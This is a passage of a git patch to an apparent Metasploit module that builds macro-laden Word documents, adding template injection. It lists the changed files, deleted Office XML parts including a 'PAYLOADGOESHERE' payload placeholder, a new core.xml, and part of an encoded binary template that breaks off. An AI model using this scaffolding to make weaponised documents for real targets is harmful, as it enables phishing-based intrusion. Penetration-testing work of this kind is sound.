From ee131957607c2d2aebcf149efa5bd44fdfe47daf Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 25 May 2017 15:53:45 -0500 Subject: [PATCH 1/2] Update office_word_macro exploit to support template injection --- .../office_word_macro/[Content_Types].xml | 2 - data/exploits/office_word_macro/_rels/__rels | 2 - data/exploits/office_word_macro/core.xml | 13 + .../office_word_macro/docProps/app.xml | 2 - .../office_word_macro/docProps/core.xml | 2 - data/exploits/office_word_macro/template.docx | Bin 0 -> 39483 bytes .../office_word_macro/{word => }/vbaData.xml | 2 +- .../exploits/office_word_macro/vbaProject.bin | Bin 0 -> 15872 bytes .../{word/_rels => }/vbaProject.bin.rels | 0 .../word/_rels/document.xml.rels | 2 - .../office_word_macro/word/document.xml | 2 - .../office_word_macro/word/fontTable.xml | 2 - .../office_word_macro/word/settings.xml | 2 - .../office_word_macro/word/styles.xml | 2 - .../office_word_macro/word/theme/theme1.xml | 2 - .../office_word_macro/word/vbaProject.bin | Bin 16384 -> 0 bytes .../office_word_macro/word/webSettings.xml | 2 - .../multi/fileformat/office_word_macro.md | 93 ++++--- .../multi/fileformat/office_word_macro.rb | 244 +++++++++++++++--- 19 files changed, 273 insertions(+), 101 deletions(-) delete mode 100644 data/exploits/office_word_macro/[Content_Types].xml delete mode 100644 data/exploits/office_word_macro/_rels/__rels create mode 100644 data/exploits/office_word_macro/core.xml delete mode 100644 data/exploits/office_word_macro/docProps/app.xml delete mode 100644 data/exploits/office_word_macro/docProps/core.xml create mode 100644 data/exploits/office_word_macro/template.docx rename data/exploits/office_word_macro/{word => }/vbaData.xml (60%) create mode 100644 data/exploits/office_word_macro/vbaProject.bin rename data/exploits/office_word_macro/{word/_rels => }/vbaProject.bin.rels (100%) delete mode 100644 data/exploits/office_word_macro/word/_rels/document.xml.rels delete mode 100644 data/exploits/office_word_macro/word/document.xml delete mode 100644 data/exploits/office_word_macro/word/fontTable.xml delete mode 100644 data/exploits/office_word_macro/word/settings.xml delete mode 100644 data/exploits/office_word_macro/word/styles.xml delete mode 100644 data/exploits/office_word_macro/word/theme/theme1.xml delete mode 100644 data/exploits/office_word_macro/word/vbaProject.bin delete mode 100644 data/exploits/office_word_macro/word/webSettings.xml diff --git a/data/exploits/office_word_macro/[Content_Types].xml b/data/exploits/office_word_macro/[Content_Types].xml deleted file mode 100644 index adcd5a2cc9..0000000000 --- a/data/exploits/office_word_macro/[Content_Types].xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/data/exploits/office_word_macro/_rels/__rels b/data/exploits/office_word_macro/_rels/__rels deleted file mode 100644 index fdd8c4f371..0000000000 --- a/data/exploits/office_word_macro/_rels/__rels +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/data/exploits/office_word_macro/core.xml b/data/exploits/office_word_macro/core.xml new file mode 100644 index 0000000000..8158becf35 --- /dev/null +++ b/data/exploits/office_word_macro/core.xml @@ -0,0 +1,13 @@ + + + + + + + + Nobody + 1 + 2017-05-25T19:12:00Z + 2017-05-25T19:28:00Z + + diff --git a/data/exploits/office_word_macro/docProps/app.xml b/data/exploits/office_word_macro/docProps/app.xml deleted file mode 100644 index b7deadb9e8..0000000000 --- a/data/exploits/office_word_macro/docProps/app.xml +++ /dev/null @@ -1,2 +0,0 @@ - -1051110Microsoft Office Word011falseTitle1false10falsefalse15.0000 \ No newline at end of file diff --git a/data/exploits/office_word_macro/docProps/core.xml b/data/exploits/office_word_macro/docProps/core.xml deleted file mode 100644 index 0e7d44d727..0000000000 --- a/data/exploits/office_word_macro/docProps/core.xml +++ /dev/null @@ -1,2 +0,0 @@ - -Windows User PAYLOADGOESHEREWindows User322017-02-01T20:39:00Z2017-02-02T22:26:00Z \ No newline at end of file diff --git a/data/exploits/office_word_macro/template.docx b/data/exploits/office_word_macro/template.docx new file mode 100644 index 0000000000000000000000000000000000000000..7a3244e700bcf40f1c2c6518ed12948a142e36b7 GIT binary patch literal 39483 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

ShORx{Mfw6^1*2`bUr)bw> z0~beKOWI!KzV8$~n29kOaD2rqKNL(T-p$Jucb*X#QJ&aGW~{tdmod=vw$YqW7j?at zowbyu|1H(#c*6+-cz%iUQXjzto7tMl;vUR{pSgy$E=^sFu4P6~aRhe)IV6WaRK^W`M_ zlEg|=C%b|#?JYZs3$@-U!tll?F}ozZ&KBWxbKZb#7V%>A~4T~5s>6( zauOgkWQZu--8mrB1uyt5DieyYG(C79t^<|Ky;y$_tf-+fwmKfX2}ch}21^3>>(R^z zqA9x+3D^S=v*sP~TQ=Z+{YxQkyp2|gCnwrhEfZxqBHR=D-ZSep0oBcoBko#|^{li_Y|909x93cO1r~UJ72Y(kS{ZIY= zre2Z50iqwC;pe^{d4^OyGVcP_dmZ#hyKTT^xp;c zU)I5&`u%s2(*Jma|L=+aWqJSfPyQ~_pZfi;`uq=XWBR+m{>wV})BpavNPoU<>|g2N zPyghf_2lRH{m(M_VV(c)iT~xX>ZgD5cai@8*FPB{n>+H4KNNJDL&5hVVWkzXrI-e~#Di3&*e7tuw} zT7_-x%QfYxXZUd^P-^GTU%Sfjx+RwUh!E;j$~xr8b={m`%E?d5rT!St#3X=OGJHs3 zKgfM@zfO6>32AvnlH{YFEYyO_8wQ4Q8yY{b6ZBCu@>|LjO zpM~mCYWL*hGf6;_1g-@$G0xjCAR!c42dHHPEbI1?p&%UECiY0>cJywrX{w#1KzNLHdO9DETG7>A%ov>YLCK@L zkkdc%Qq`kicMC2ZOiwPfO4k7?Y5i{eneN2~ha3RH(2df@!m|2l{mN#r7eC6%> zx>a0yzLJlhqQ-42wQRkZn)~UwNbl;|f($DwIl1wOIv{lJFOa*Ym+hKg5G?8rE5b5|Ej9xT~HVuM%N z#Osge*F8bocOu%7(X-r2(we1s>%O;x`7u*x%3W{Hzq*JRXq|WaKAumC`0c^HxKSAQ z`q95_m@WL~$1Y8`-`y0{I<}`u$d&aA$~IZlX=3G%Y`qb-d<5@6vfoS<$}!UqWVW!6 zbOdh&=-sDyXi|*PswDMb&)}^{gf|+`g$6ea7zgNMnzxrOd0z(zWYpv08Q@kOwbFB5 z4IT`MwBo;f?SoHpz2~q!8}4YCA+}y1oOqJLYjMh+K`%&7rz+FEeHZL`-6mh!dxVMt 